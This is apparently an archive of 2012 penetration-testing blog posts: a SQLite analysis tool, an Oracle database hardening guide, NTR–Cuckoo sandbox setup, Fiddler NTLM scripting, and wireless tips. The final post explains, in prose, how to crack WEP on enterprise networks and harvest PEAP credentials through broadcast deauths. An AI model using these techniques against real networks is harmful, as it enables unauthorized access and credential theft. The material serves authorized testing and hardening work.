Tuesday, March 27, 2012

sqlitespy for SQLite Database Analysis

By Gursev Kalra.

SQLite is the ubiquitous database for iPad, iPhone, and Android applications. It is also used by certain internet browsers, web application frameworks, and software products for their local storage needs. During penetration tests, we often see sensitive information like usernames, passwords, account numbers, and SSNs insecurely stored in these databases. Thus, every penetration test requires comprehensive analysis of the local databases in use.

While analyzing databases, a penetration tester repeatedly does the following:

  1. Opens the database in sqlite reader (sqlite3 or other readers)
  2. Views various tables and columns to understand database layout and schema
  3. Analyzes the storage for sensitive information

As the number and size of databases increase, analysis time grows rapidly. To escape the recurring pain, I wrote a Ruby script to automate this process. The script achieves the following:
  1. Analyzes multiple databases in a single run.
  2. Queries and displays database schema
  3. Provides an option to run search on Table and Column Names for quick analysis
  4. Looks for search strings in the following:
    1. Table Name
    2. Column Names
    3. Actual Data
  5. Performs case-insensitive regular expression search by default; this can be tuned with command line options to suit one's requirements
  6. Displays Database, Tables and Row Number reference for every successful match
  7. Dumps database rows on a successful match


Download Link - http://www.opensecurityresearch.com/files/sqlitespy.rb.bz2

sqlitespy's dependencies are listed below:
  1. Ruby - http://www.ruby-lang.org/en/
  2. Sequel Gem - http://rubygems.org/gems/sequel
  3. sqlite3 - http://sqlite.org/download.html
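The search logic the script automates can be sketched with Python's standard sqlite3 module (the script itself is Ruby with Sequel; the function and variable names here are illustrative, not from sqlitespy):

```python
import re
import sqlite3

def search_db(path, patterns, ignore_case=True):
    """Regex-search table names, column names, and row data of one database."""
    flags = re.IGNORECASE if ignore_case else 0
    regexes = [re.compile(p, flags) for p in patterns]
    hits = []
    conn = sqlite3.connect(path)
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        # PRAGMA table_info rows are (cid, name, type, notnull, dflt, pk)
        cols = [r[1] for r in conn.execute(f"PRAGMA table_info({table})")]
        for rx in regexes:
            if rx.search(table):
                hits.append((path, table, 'table-name', table))
            for col in cols:
                if rx.search(col):
                    hits.append((path, table, 'column-name', col))
        # search the actual stored data, remembering the row number reference
        for rownum, row in enumerate(conn.execute(f"SELECT * FROM {table}"), 1):
            if any(rx.search(str(value)) for rx in regexes for value in row):
                hits.append((path, table, f'row {rownum}', row))
    conn.close()
    return hits
```

Running this over each database path in turn gives the multi-database, schema-plus-data search described above.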


sqlitespy help:

sqlitespy sample run with multiple search strings and row information dump for a successful match:

sqlitespy sample run with minimal information:

sqlitespy database schema dump:

Tuesday, March 20, 2012

Top 10 Steps to a Secure Oracle Database Server

By Chris Stark.

There are numerous resources on the Internet that detail secure configurations for Oracle; CISecurity, NIST, SANS, and Oracle just to name a few. Despite this, however, Foundstone continues to encounter vulnerable Oracle databases in our internal and external penetration tests. More often than not, we consultants are able to leverage the vulnerable Oracle databases to compromise additional hosts. A single vulnerability in an Oracle database can eventually be escalated to privileged credentials in Active Directory or LDAP.

Why do we continue to encounter Oracle servers with misconfigurations and other vulnerabilities that can easily be avoided with just a little effort by DBAs?

There are many reasons, but in my opinion these are some of the most common:
  1. Understaffed Security Teams - Simply a lack of internal or third-party security professionals to bring visibility to the importance of database security. If there are no security professionals in the organization, or the ones present lack the skills or resources to perform periodic security assessments of databases, database misconfigurations will often go undetected.
  2. DBAs "don't do" security - The reality in many organizations is that DBAs are administrators focused on database availability and performance, not security. DBAs might be reluctant to implement secure configurations due to a lack of full understanding of the security risks (the vulnerability and exposure of not implementing the secure configuration), or due to fear that the secure configuration will unintentionally break some functionality. To boil it down, DBAs might have some fear, uncertainty, and doubt (FUD) about implementing secure database configurations.
  3. Not "secure by default" - Since the release of Oracle 9, Oracle has made a public effort to change their installation routines so that they are "secure by default". However, as you will see in the settings discussed in this post, for various reasons the majority of them are not set "secure by default".

Even though there are excellent resources on the Internet for implementing secure Oracle configurations, they aren’t being followed. The purpose of this article is to discuss the configurations that will have the greatest impact on securing your Oracle database implementations. Hopefully, if at least these top 10 configurations are implemented on your Oracle servers, you will never be in a situation where the Oracle servers were the chink in the armor that hackers used to pwn your network.

At the time of this article, there are only two supported versions of Oracle, 10g and 11g, so the recommendations here focus on those two versions. The following 10 recommendations are ordered by severity, with the recommendations that will have the greatest benefit to the security posture of the database server at the top of the list.

1. Lock Down Default Accounts!

Default privileged Oracle accounts continue to be the highest-risk issue that we commonly encounter. It is an incredibly easy issue to fix and prevent.

After installation, Oracle has a number of default accounts, each with a preset default password. Post database install, the Oracle Database Configuration Assistant (DBCA) automatically locks and expires the majority of the default database user accounts. Additionally, DBCA changes the SYSTEM account password to the value specified during the installation routine.

If an Oracle database is manually installed, the DBCA never executes, and those dangerous default privileged accounts are never locked and expired. By default, their password is the same as their username. These will be the very first credentials that a hacker will attempt to use to connect to the database! As a best practice, configure each of these accounts with a strong unique password, and if they are not required, they should be locked and expired.

To change the password, execute the following SQL:

sqlplus> connect mydba
sqlplus> ALTER USER SYSTEM IDENTIFIED BY <new strong password>;

The following SQL can be used to lock and expire those default accounts:

sqlplus> connect mydba
sqlplus> ALTER USER SYSTEM ACCOUNT LOCK PASSWORD EXPIRE;

The default accounts installed with Oracle vary by version. Here is a quick reference of the accounts that are installed by default (if the DBCA is never executed) in Oracle 9, 10, and 11 in an open state.

(Table: the default accounts left open in Oracle 9, Oracle 10 Release 1 and 2, and Oracle 11.)

Starting with Oracle 11g, DBAs can easily locate any accounts with default passwords (same as username) by using the database view DBA_USERS_WITH_DEF_PWD.

2. Require all database connections to use a strong SID

The Oracle System ID, or SID is a unique value that is required for all clients to connect to the Oracle database. Because it must be unique, you cannot have more than one database with the same SID on the same Oracle server.

If a client connection uses a wrong SID to connect to an Oracle database, it will get the message "ORA-12505: TNS:listener does not currently know of SID given in connect descriptor". SIDs can be brute forced, and there are numerous tools for doing so: Metasploit modules, OAT, OAK, SIDGuess, etc.

The key to thwarting SID brute forcing is to select a SID that is strong. When creating an Oracle SID, select one that includes the following elements.
  • Not a dictionary word
  • At least 10 characters in length
  • Includes at least one special character
Incorporating these elements will ensure the SID is strong, that is, difficult for an attacker to brute force.
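A quick way to sanity-check a candidate SID against these criteria is a few lines of Python (illustrative sketch; the word set is a stand-in for a real dictionary file):

```python
import re

COMMON_WORDS = {"orcl", "oracle", "prod", "test", "dev"}  # stand-in dictionary

def sid_is_strong(sid):
    """True if the SID meets the three criteria listed above."""
    return (sid.lower() not in COMMON_WORDS        # not a dictionary word
            and len(sid) >= 10                     # at least 10 characters
            and re.search(r"[^A-Za-z0-9]", sid) is not None)  # special char
```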

Why does a strong SID matter when the SID is stored as a clear-text value within the Oracle client configuration file, tnsnames.ora, on every single system that is configured to connect to the database?

This is true - as long as an attacker could compromise at least one system that is configured to connect to the Oracle database, getting the SID from the TNSNAMES.ORA file is trivial. But, think about the instances where the attacker is external to the organization and has compromised a single host that does not have an Oracle client connection configured. A strong SID will not in itself prevent a hacker from gaining a connection to your Oracle database, but it is a good practice as an additional layer as a part of a Defense in Depth approach to security.

For a good white paper on the methods that can be used to obtain an Oracle SID, check out Alexander Polyakov's white paper. It is a bit old, but most of the methods discussed are still relevant.

3. Apply Oracle Critical Patch Updates ASAP

This is one of those security best practice recommendations with which most organizations struggle. Depending on the database schema, Oracle Critical Patch Updates (CPUs) can have a significant impact on the Oracle database. Significant enough that the organization might have to perform extensive regression testing to ensure that applying the latest Oracle CPUs has no impact on database functionality.

Oracle releases Critical Patch Updates quarterly, on the Tuesday closest to the 17th day of the month. Oracle has a special bulletin page that describes all of the most recent Oracle Critical Patch Updates and Advisories. Fortunately, CPUs are cumulative in nature: you just need to install the latest Oracle CPU to gain all of the security patches since the product's initial release.
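Because the schedule is fixed, the release dates are easy to compute ahead of time for planning regression-test windows. A small helper (my sketch, not from Oracle):

```python
from datetime import date, timedelta

def cpu_dates(year):
    """Quarterly CPU dates: the Tuesday closest to the 17th of Jan/Apr/Jul/Oct."""
    out = []
    for month in (1, 4, 7, 10):
        seventeenth = date(year, month, 17)
        # weekday(): Monday=0 ... Tuesday=1; days forward to the next Tuesday
        offset = (1 - seventeenth.weekday() + 7) % 7
        if offset > 3:       # the previous Tuesday is closer, step backwards
            offset -= 7
        out.append(seventeenth + timedelta(days=offset))
    return out
```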

The key to an effective CPU patch process is creating a regimented regression testing process that corresponds to Oracle's four scheduled releases every year. Even the most stringent regression testing processes can usually be architected in such a manner that patches are applied no more than 3 months after the last CPU release. Additionally, all DBAs should register with the Oracle email Security Alert Advisory service to ensure timely notification of Oracle patches and Security Alerts.

There is also a mechanism Oracle can employ if a critical vulnerability is discovered that warrants an immediate patch release; Oracle calls patches released under that program off-schedule Security Alerts. Since the CPU program began in 2005, there have only been a few occasions when Oracle released patches under that emergency process. Organizations should work out a method for applying these emergency patches, but given their historically low volume, the focus should be on the routine of applying the CPU patches every quarter. Oracle has a good whitepaper with recommendations for applying CPU patches; it is an excellent resource for any organization implementing an Oracle patch management process.

4. Remove all unnecessary privileges from the PUBLIC role

In Oracle, extended routines exist that allow a minimally privileged user to execute functions that they otherwise would not be able to execute. These extended routines are called packages, and are roughly equivalent to Extended Stored Procedures in Microsoft SQL Server. A special role, called PUBLIC, acts as a default role assigned to every user in the Oracle database. Any database user can exercise privileges that are granted to PUBLIC, and this is commonly exploited for database privilege escalation.

These packages and subtypes should be revoked from PUBLIC and made executable for an application only when absolutely necessary! For example:

sqlplus> REVOKE EXECUTE ON UTL_TCP FROM PUBLIC;

In descending order of risk, the following table lists the most dangerous packages granted by default to the PUBLIC role:
Package or Subtype Description
DBMS_SQL* This package provides an interface to use dynamic SQL to parse any data manipulation language (DML) or data definition language (DDL) statement from within PL/SQL.

David Litchfield discovered the vulnerability in this package and presented it at Blackhat in 2007. He demonstrated that a user could escalate their privileges through cursor snarfing and cursor injection. This problem has been fixed in Oracle 11g, but is still present in other versions. Given that this package is extremely dangerous, and any database user can escalate to SYS, its necessity should be closely scrutinized. If native dynamic SQL is not required, the package should be removed.
DBMS_XMLGEN The DBMS_XMLGEN package converts the results of a SQL query to a canonical XML format in real-time.

An attacker can exploit this package with SQL injection. Similarly to the DBMS_SQL package, all data, including user credentials can be extracted from the database. Given that this package is extremely dangerous, its necessity should be closely scrutinized. If dynamic XML database queries are not required, the package should be removed.
UTL_TCP* This package facilitates outgoing network connections from the database server to any receiving (or waiting) network service. Granting this package to PUBLIC may permit arbitrary data to be sent between the database server and any waiting network service.
DBMS_CRYPTO This package can be used to encrypt stored data. Generally, most users should not have the privilege to encrypt data, since encrypted data may be non-recoverable if the keys are not securely generated, stored, and managed.
UTL_HTTP* This package allows the database server to request and retrieve data using HTTP. By default, it allows every user to access data over the Internet from HTTP. An attacker could exploit this package with an HTTP request to send a SQL injection to the database to dump user’s credentials, and other sensitive data.

According to the least privilege principle, revoke all grants to this package if your applications do not need it.
HTTPURITYPE This subprogram is a subtype of the UriType that provides support for the HTTP protocol. It uses the UTL_HTTP package underneath to access the HTTP URLs. By default, it allows every user to transfer data from the database via HTTP. An attacker could exploit this package with an HTTP request to send a SQL injection to the database to dump user’s credentials, and other sensitive data.

According to the least privilege principle, revoke all grants to this package if your applications do not need it.
DBMS_ADVISOR The DBMS_ADVISOR package is part of the Server Manageability suite of Advisors, a set of expert systems that identify and help resolve performance problems relating to the various database server components.

Because this package allows direct file system access, it can be used by an attacker to interact with the file system, outside of the database.
UTL_SMTP This package permits arbitrary mail messages to be sent from one arbitrary user to another arbitrary user. An attacker could use this as a part of a larger social engineering attack. Most likely your application will not need this type of functionality from the database, and you should revoke all grants to this package.
UTL_INADDR This package allows arbitrary domain name resolution to be performed from the database server, which could allow an attacker to enumerate your internal resources. According to the least privilege principle, revoke all grants to this package if your applications do not need DNS resolution.

5. Enable Database Auditing

Audit SYS Operations

By default, Oracle databases do not audit SQL commands executed by the privileged SYS user, or by users connecting with SYSDBA or SYSOPER privileges. If your database is hacked, these privileges are going to be the hacker's first target. Fortunately, auditing SQL commands of these privileged users is very simple:
sqlplus> alter system set audit_sys_operations=true scope=spfile;

Enable Database Auditing

Oracle auditing of ordinary SQL commands is also not enabled by default. Auditing should be turned on for all SQL commands. Database auditing is turned on with the audit_trail parameter:

sqlplus> alter system set audit_trail=DB,EXTENDED scope=spfile;
Note: The command above writes audit records, including the full SQL text and bind values (EXTENDED), into the table SYS.AUD$. The audit_trail parameter accepts several destinations: OS, DB, DB,EXTENDED, XML, and XML,EXTENDED.

Enable Auditing on Important Database Objects

Once auditing has been enabled, it can be turned on for objects where an audit trail is important. The following is a list of common objects that should be audited:


6. Setup Database Triggers for Schema Auditing and Logon/Logoff Events

In order to effectively audit schema changes and logon/logoff events, Oracle provides triggers that can report the exact change, when it was made, and by which user. There are several ways to audit within Oracle with triggers, but the following three are recommended by Alexander Kornbrust of Red-Database-Security, and I recommend all DBAs consider implementing them:

Logon Trigger

By using a logon trigger, you can send logon and logoff events in real-time to another system. Think of it as a syslog daemon for your database events.

This example below would send all logon and logoff events to a web server in real-time.

Command (as user SYS):
SQL> create or replace trigger sec_logon after logon on database
declare
  rc VARCHAR(4096);
begin
  begin
    rc := utl_http.request('http://<web server IP>/user='||user||';host='||sys_context('USERENV','HOST')||';ip='||ora_client_ip_address||';sysdate='||to_char(sysdate, 'YYYY-MM-DD hh24:mi:ss'));
  exception
    when utl_http.REQUEST_FAILED then null;
  end;
End sec_logon;
/
NOTE: Change the IP address to your web server’s address.
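The trigger just issues an HTTP GET with the event in the query string, so any web server that logs requests will do on the receiving end. A minimal illustrative receiver (my sketch, not part of the original post) in Python:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

EVENTS = []  # each entry is one logon/DDL event, e.g. '/user=SCOTT;ip=...'

class AuditHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        EVENTS.append(self.path)      # record the event sent by the trigger
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):     # keep stderr quiet
        pass

def serve(host="0.0.0.0", port=80):
    """Listen on the address used in the trigger's utl_http.request() URL."""
    HTTPServer((host, port), AuditHandler).serve_forever()
```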


DDL Trigger

Using Data Definition Language (DDL) triggers, an Oracle DBA can automatically track all changes to the database, including changes to tables, indexes, and constraints. The data from this trigger is especially useful for change control.

The example below will send events for GRANT, ALTER, CREATE, and DROP statements.
Command (as user SYS):

SQL> create or replace trigger DDLTrigger after DDL on database
declare
  rc VARCHAR(4096);
begin
  begin
    rc := utl_http.request('http://<web server IP>/user='||ora_login_user||';DDL_TYPE='||ora_sysevent||';DDL_OWNER='||ora_dict_obj_owner||';DDL_NAME='||ora_dict_obj_name||';sysdate='||to_char(sysdate, 'YYYY-MM-DD hh24:mi:ss'));
  exception
    when utl_http.REQUEST_FAILED then null;
  end;
End DDLTrigger;
/
NOTE: Change the IP address to your web server’s address.

Error Trigger

Error triggers fire on Oracle error messages. They can be useful for detecting SQL injection and other attack methods.

Command (as user SYS):
SQL> create or replace trigger after_error after servererror on database
DECLARE
  pragma autonomous_transaction;
  id NUMBER;
  sql_text ORA_NAME_LIST_T;
  v_stmt CLOB;
  n NUMBER;
BEGIN
  n := ora_sql_txt(sql_text);
  IF n >= 1 THEN
    FOR i IN 1..n LOOP
      v_stmt := v_stmt || sql_text(i);
    END LOOP;
  END IF;
  FOR n IN 1..ora_server_error_depth LOOP
    IF ora_server_error(n) in (/* leading error codes lost in formatting */
        '1722','1742','1756','1789','1790','24247','29257','29540') THEN
      INSERT INTO system.oraerror VALUES (SYS_GUID(), sysdate, ora_login_user,
        ora_client_ip_address, ora_server_error(n), ora_server_error_msg(n),
        v_stmt);
      COMMIT;
    END IF;
  END LOOP;
END after_error;
/

NOTE: This trigger writes to the system.oraerror table, which must be created before the trigger is.

7. Implement a Database Activity Monitoring (DAM) Solution

If you can afford the extra expense of an additional software product, a Database Activity Monitoring solution can be very useful. It solves a problem where you might not otherwise be able to monitor your DBAs' activity at an organizational level. It also provides useful insight into dangerous SQL queries and role modifications that might indicate an attacker has compromised your database. The key to all of the DAM solutions is that they operate within memory of the Oracle server and operate independently of the database's native auditing and logging functions. For anyone familiar with network Intrusion Detection Systems (IDS), DAMs serve an analogous function; they just operate within the database layer on the server rather than at the network layer.

I’ve had really good feedback from our clients that McAfee’s Database Activity Monitoring (Formerly Sentrigo Hedgehog) is easy to implement and provides immediately useful alerts; however, I have no personal experience with the product.

8. Enable Password Management for all Oracle Logins

Oracle provides fairly robust password management for Oracle logins. Unfortunately, none of these controls are applied in the default Oracle account profile.

In Oracle, logins are assigned an account policy through an Oracle profile. Each login can have only one Oracle profile applied. If no Oracle profile is specified when the login is created, it is assigned the default Oracle profile.

Oracle covers the syntax for Oracle profiles well, but here are the recommended settings at a high level:

Creating Profiles

Oracle profiles are created with:

CREATE PROFILE profilename LIMIT <parameter> <value> [<parameter> <value> ...];

Users are added to the profile with:

ALTER USER username PROFILE profilename;

Account Lockout

Locking accounts after 5 invalid attempts for 30 days greatly reduces the risk of brute force attacks. If 30 days is not feasible, even a setting of 1 day will greatly reduce the risk of brute force attacks.

The following two parameters are used to specify account lockouts in an Oracle profile: FAILED_LOGIN_ATTEMPTS (the number of failed attempts before lockout) and PASSWORD_LOCK_TIME (the number of days the account stays locked).
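To see what a lockout policy buys you, here is a back-of-the-envelope estimate of how many online guesses a brute forcer gets per year (my illustration, figures from the recommendation above):

```python
def guesses_per_year(attempts_before_lock, lock_days):
    """Upper bound on online password guesses per year under a lockout policy."""
    cycles = 365 / lock_days          # lockout windows per year
    return int(cycles * attempts_before_lock)
```

With 5 attempts and a 30-day lock an attacker gets about 60 guesses a year; even a 1-day lock caps them at well under two thousand, versus millions without any lockout.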


Password Expiration

By expiring passwords, you help ensure that they are changed on a periodic basis. Expiring user passwords at least every 90 days is a security best practice.

The parameter used to specify how many days can elapse before a user must change their password is PASSWORD_LIFE_TIME.

Password History

Without password history, users will most likely reuse the same password that they remember well each time they are forced to change it. To ensure that users don't reuse passwords there are two parameters: PASSWORD_REUSE_TIME and PASSWORD_REUSE_MAX. The important thing to note is that these settings are cumulative, and both thresholds must be met before a user is able to reuse an old password.

In general, a password reuse time of 1 day is sufficient in conjunction with a password reuse maximum of 10 or more.

Setting the password reuse time higher than 1 day may be problematic if users frequently change their password.

The important thing to note with these two settings is that neither should be set to UNLIMITED.
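The cumulative rule can be expressed directly. A sketch (the parameter names are Oracle's; the function itself is mine, for illustration):

```python
def may_reuse(days_since_last_use, changes_since_last_use,
              reuse_time=1, reuse_max=10):
    """An old password may be reused only when BOTH thresholds are satisfied:
    PASSWORD_REUSE_TIME days have elapsed AND at least PASSWORD_REUSE_MAX
    intervening password changes have occurred."""
    return (days_since_last_use >= reuse_time
            and changes_since_last_use >= reuse_max)
```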


Password Complexity Verification

Without a password complexity verification function, users will most likely choose simple dictionary words that are easy to remember, and easy for a hacker to guess.

In Oracle, a PL/SQL script must be set (via the PASSWORD_VERIFY_FUNCTION profile parameter) to check the complexity of a user's password. For specific example password verification PL/SQL scripts, refer to Oracle's documentation.

In general, the password verification function should ensure users' passwords meet the following criteria:

  1. Differ from the username
  2. Not be a dictionary word
  3. Be at least 10 characters in length
  4. Include at least 1 alpha, 1 numeric, and 1 special character
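These criteria translate directly into a verification routine. Oracle's real mechanism is a PL/SQL function; this Python sketch just mirrors the logic (the word set is a stand-in for a real dictionary file):

```python
import re

DICTIONARY = {"password", "welcome1", "oracle"}  # stand-in word list

def password_ok(username, password):
    """Apply the four criteria listed above."""
    if password.lower() == username.lower():
        return False                      # must differ from the username
    if password.lower() in DICTIONARY:
        return False                      # must not be a dictionary word
    if len(password) < 10:
        return False                      # at least 10 characters
    # at least one alpha, one numeric, and one special character
    return all(re.search(p, password)
               for p in (r"[A-Za-z]", r"[0-9]", r"[^A-Za-z0-9]"))
```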

9. Perform Regular Database Security Assessments

Every secure configuration discussed in this article can be easily detected with an automated database vulnerability tool. I'm a big fan of automated database vulnerability tools as they provide an excellent way to quickly validate your Oracle secure configurations. Obviously these kinds of tools are only useful if you have privileges; they are intended for DBAs, auditors, and security professionals to run for regular assessments. These tools are prone to false positives, and unfortunately they can also miss items (false negatives), but their benefits greatly outweigh their risks.

An important thing to note with these tools is that, in organizations that use them, I commonly see the special accounts used for performing the automated security scans being mishandled. These accounts are either highly privileged or have extensive query capabilities with access to all objects on the database. By their nature they should be safeguarded, and a secure password profile should be applied. Ideally they should be left in a locked state when not actively in use.

The two products I've used over the years are AppDetectivePro and McAfee Security Scanner for Databases (formerly Sentrigo's RepScan). I've used McAfee's product more extensively over the past year, so I'm naturally biased. Given that bias, I prefer McAfee's product as it is easier to dynamically query the database with the tool and collect data that can be analyzed offline and outside of the tool. Some people prefer AppDetectivePro, however, as it tends to be more automated.

10. Encrypt Database Traffic

This last recommendation is rarely implemented, except in the most secure organizations. Oracle supports network-level encryption via both SSL, using X.509v3 signed certificates, and native encryption without certificates.
The takeaway with network-level encryption is not only that sensitive data in transit is protected, but also that the SID is protected. Without encryption, the SID can be easily enumerated through man-in-the-middle attacks.

Implementing network level encryption is too large of a topic to post the steps in this article, but Oracle has the following excellent resources on the topic:


As I've mentioned throughout this post, there are a lot of great resources on the internet. Here are some of the ones that were referenced during the writing of this article. Note that some of the permission descriptions were taken from the sources below for use in this article.

Monday, March 19, 2012

Setting Up NTR with Cuckoo

By Melissa Augustine.

The guys over at Advanced Malware Protection (AMP) put out an awesome blog post about integrating Network Threat Response (NTR) with the Cuckoo Sandbox a little while ago and I really liked the idea so I wanted to implement it for myself.


If you're unfamiliar with the two tools, here is a quick breakdown:
  • NTR - A network analysis tool which uses multiple vectors to determine potential maliciousness. It not only uses signatures and looks for shellcode, but also does IP/domain reputation analysis as well as AV scanning of files observed on the wire. You can get a free VMware image to try out here. The VM allows you to upload pcaps for analysis, while the pay-for version allows you to set up sensors which then feed into NTR.
  • Cuckoo - A sandbox for analyzing malware. Produces a lovely report with screenshots (if the right plugin is installed), network activity, some static analysis (if the sample is an exe), behavioral analysis, and a process tree.

When AMP posted that blog I thought: "How awesome would this be? - 'You are analyzing a PCAP with NTR, it flags a potentially malicious file -- now you can push to Cuckoo via shared folders and it will automatically be submitted for analysis... all while still analyzing the PCAP! Nice'"

Setup Notes

Between the AMP blog post and the Cuckoo documentation you should have most of the installation covered, but I did run into a handful of problems. Here's the process and some of what was left out:

  1. Download and set up the NTR Virtual Machine
  2. Create an Ubuntu VM using the installation ISO
  3. Within the Ubuntu VM, set up and install VirtualBox.
    • The thing to remember here is that when you create a user and add them to the vboxusers group, you HAVE to log off and log back on for it to take effect. Restarting (apparently) does not fix it.
  4. Within the Ubuntu VM, install and set up a Windows VM (you'll need the installation media for this).
    • Install any supporting applications within the Windows VM (e.g. You may need a PDF viewer if you're using a malicious PDF)
    • When creating the shared folders for file transfers, you'll first need to install VirtualBox's "Guest Additions".
  5. At this point, you're ready to go through AMP's blog post. Some notes:
    • Samba Configuration: There was some disconnect in the AMP blog post in regards to setting Samba up, so I took a simpler method and simply right-clicked the folders from within X Windows and used the sharing option. I did run across one tiny error, but the error itself contained the solution:

    • The watcher.rb script had a small typo. Change:
      IO.popen("./run-sample.sh /opt/ntr/samples/#{ev.name}")

      to:

      IO.popen("./run-sample.sh /opt/ntr/samples/#{event.name}")
    • run-sample.sh needs the directory which contains cuckoo.py defined. If you do not have cuckoo.py in /opt/cuckoo, you'll need to change the variable in the script or move it there
    • watcher.rb also needs executable rights on run-sample.sh. If you don't have it appropriately set, you'll get an error saying watcher.rb can't find run-sample.sh. To set:

      chmod +x run-sample.sh

    • In NTR, I had to specify my workgroup as well to mount the cuckoo share; the mount command ended up being:

      sudo mount -t cifs -o username=RainbowBrite,password=Starl1ght,domain=WORKGROUP //<server>/<share> /mnt/cuckoo

After some blood, sweat, and coffee... this is the final result you hope to achieve (make sure you have all the scripts running and folders mounted!)
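What watcher.rb does can be sketched as a stdlib-only polling loop in Python (the real script uses inotify; the paths mirror the post, and the sketch is mine):

```python
import os
import subprocess
import time

def poll_new(sample_dir, seen):
    """Return paths of files in sample_dir not yet in `seen` (updates seen)."""
    new = []
    for name in sorted(os.listdir(sample_dir)):
        if name not in seen:
            seen.add(name)
            new.append(os.path.join(sample_dir, name))
    return new

def watch(sample_dir="/opt/ntr/samples", interval=1.0):
    """Submit every file NTR drops into sample_dir to Cuckoo via run-sample.sh."""
    seen = set()
    poll_new(sample_dir, seen)            # skip files already present
    while True:
        time.sleep(interval)
        for path in poll_new(sample_dir, seen):
            # equivalent of watcher.rb's IO.popen("./run-sample.sh ...")
            subprocess.Popen(["./run-sample.sh", path])
```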

Exporting in Action

I made this quick video to demonstrate exporting to Cuckoo:

Tuesday, March 13, 2012

Fiddler and NTLM authentication

By Neelay S Shah.

I was testing a web application recently that used NTLM (over HTTP) to authenticate users. I was using Fiddler to test the web application and ran into a problem that was hampering and slowing down my testing: I could not use the "Composer" tab to send manual requests from within Fiddler, or use the "Replay Request" option. In either of those two cases, the server would respond with "401 Unauthorized" and Fiddler would not prompt me to enter credentials; it would just stop. It was really limiting my testing and reducing my efficiency, and I love Fiddler, so as far as possible I did not want to switch to another HTTP proxy.

As I was researching a solution/workaround for this, I came across an excellent post - Fiddler and Channel Binding Tokens Revisited by Eric Law - wherein Eric suggests a workaround to a problem you may encounter while using Fiddler to test web applications using NTLM over HTTPS. In my case, the web application was not using SSL and performed NTLM authentication over clear-text HTTP, but I was able to adapt Eric's workaround so that it works in this scenario.

Following is the script that I added to my FiddlerScript Rules file. I strongly recommend installing the Syntax Highlighting extension - http://fiddler2.com/redir/?id=SYNTAXVIEWINSTALL before attempting to modify the FiddlerScript Rules. Once you install the Syntax Highlighting extension, launch Fiddler and you should see a new tab “FiddlerScript” (between the Composer and the Filters tab). Click the “FiddlerScript” tab and that should open the Rules file. Then you can add the following code appropriately and click “Save Script”.

You will most likely already have an OnPeekAtResponseHeaders() function in which case simply add the following code to the beginning of the OnPeekAtResponseHeaders() function. You will also have to modify the web site address and the test user credentials within the script before using it.

 // NOTE – Do NOT use this in a production environment. Only use in a test  
 // environment with test user credentials. All connections passing  
 // through Fiddler and directed at the concerned web application  
 // will automatically be authenticated using the embedded test user  
 // credentials  
 static function OnPeekAtResponseHeaders(oSession: Session) {  
  // To avoid problems with Channel-Binding-Tokens, this block allows  
  // Fiddler itself to respond to Authentication challenges from the  
  // web site  
  if ((oSession.responseCode == 401) &&  
   // Only permit auth to sites we trust  
   // CHANGE your.web.site.url.address to whichever site you're testing  
   oSession.HostnameIs("your.web.site.url.address")) {  
   // CHANGE enter the appropriate creds here:  
   oSession["X-AutoAuth"] = "domain\\username:password";  
   oSession["ui-backcolor"] = "pink";  
  }  
 }  

Once you add this code and save the Script Rules, the rule will be in effect and Fiddler will start applying it. Now, if you make a manual request using the Composer tab or Replay/Reissue requests, Fiddler will automatically handle the server's "401 Unauthorized" response and authenticate using the test user credentials embedded in the script. Additionally, the request session will be highlighted in faint pink within the Fiddler "Request Response/Session List" so that simply by viewing the list you can identify which requests were hit by the rule.

Tuesday, March 6, 2012

Wireless Tipz

By Robert Portvliet and Tony Lee

Cracking WEP on Enterprise Networks

When cracking WEP on an enterprise wireless solution (e.g. Aruba, Cisco), you'll notice that many times the AP will send deauth frames once you start replaying ARP packets back into the network. There are a couple ways to circumvent this annoyance.

Impersonate a Connected Client

What works for me is to simply use the MAC address of an already associated client as the source MAC in aireplay-ng instead of my own. This seems to work quite well and only requires a few stops and starts of aireplay-ng to keep the data counter heading upwards at a reasonable rate. Brad Antoniewicz does this by crafting ICMP packets using packetforge-ng with the recovered key stream and then injecting those packets into the network. Apparently, the AP doesn’t find this behavior quite so offensive as using ARP packets.
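As a rough sketch (the BSSID, client MAC, interface name, IP addresses, and keystream file below are all placeholders to adjust for your environment), the client-impersonation replay and the ICMP-injection alternative look something like this:

```shell
# Replay captured ARP requests, using the MAC of an already-associated
# client (-h) as the source instead of your own
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 mon0

# Alternative: forge an ICMP packet with a recovered keystream (.xor)
# and inject that instead of ARP
packetforge-ng --icmp -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 10.0.0.1 -l 10.0.0.2 -y keystream.xor -w icmp.cap
aireplay-ng --interactive -r icmp.cap mon0
```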

Remain Persistent

Nick Roberts had success using fakeauth and his own MAC address for the source MAC in aireplay-ng. To be successful, you need to restart the ARP replay whenever you receive a deauth, until the fakeauth can authenticate you again.
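A sketch of that workflow (the BSSID, your MAC, and the interface name are placeholders):

```shell
# Keep a fake authentication alive, re-authenticating every 30 seconds,
# using your own MAC address as the source
aireplay-ng --fakeauth 30 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 mon0 &

# Replay ARP requests; restart this whenever you receive a deauth and
# the fakeauth has re-associated you
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 mon0
```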


Deauth the Broadcast Address

If PEAP clients will not connect to your FreeRADIUS-WPE server even after you send directed deauths (usually due to proper client-side EAP configuration), try sending a deauth packet to the broadcast address. The wireless drivers in most laptops will ignore it, but a fair number of mobile devices will respond to it. Because of this, you won't cause too much disruption on the wireless network, yet you will likely capture authentication exchanges from the mobile devices as they attempt to re-authenticate. Mobile devices also seem to be the most likely to be misconfigured for PEAP: many employees eventually figure out that they can use their domain credentials on their corporate or personal phones to connect to the corporate wireless (even though it may be against policy), and, lacking the knowledge to configure the device securely, they end up with a phone that will connect to anything purporting to be the corporate wireless.

This attack is best executed using two cards. The first card runs the FreeRADIUS-WPE server, with a hostapd front end acting as the AP. The second card runs airodump-ng (to monitor the AP and stations being attacked) and also sends out the deauths using aireplay-ng.
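A minimal example of the broadcast deauth (the AP BSSID and interface are placeholders); omitting the client (-c) option makes aireplay-ng target the broadcast address:

```shell
# Send 10 deauth frames to the broadcast address of the target AP
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF mon0
```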

